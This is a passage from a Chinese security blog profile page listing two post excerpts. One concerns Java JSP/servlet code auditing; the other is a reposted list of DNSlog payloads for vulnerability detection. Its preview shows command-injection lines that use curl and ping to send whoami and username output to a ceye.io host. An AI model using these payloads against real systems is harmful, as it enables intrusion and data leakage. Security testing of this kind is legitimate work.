- 博客(2)
- 收藏
- 关注
原创 代码审计之jsp+servlet模式从客户端接收参数的函数大全
在java代码审计的过程中,jsp+servlet架构的形式是我们学习javaweb开发的基础,虽然它不如SpringMVC框架流行,但是在view层的处理还大多依赖于jsp,jsp作为用户和服务器操作数据的入口,我们总结一下jsp的输入函数还是十分必要的。安全的威胁也是主要来自于客户端的输入,如果我们对客户端的数据数据在后台有严格的校验,那么我们也就能更深层次的保护我们的网站安全。在
2016-06-24 17:12:30 1246
转载 利用DNSlog技术间接判断漏洞是否存在的常用payload
0x00 Command Executioni. *nix:curl http://ip.port.b182oj.ceye.io/`whoami`ping `whoami`.ip.port.b182oj.ceye.ioii. windowsping %USERNAME%.b182oj.ceye.io0x01 SQL InjectionFrom http://docs.
2016-06-13 21:22:46 4717
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人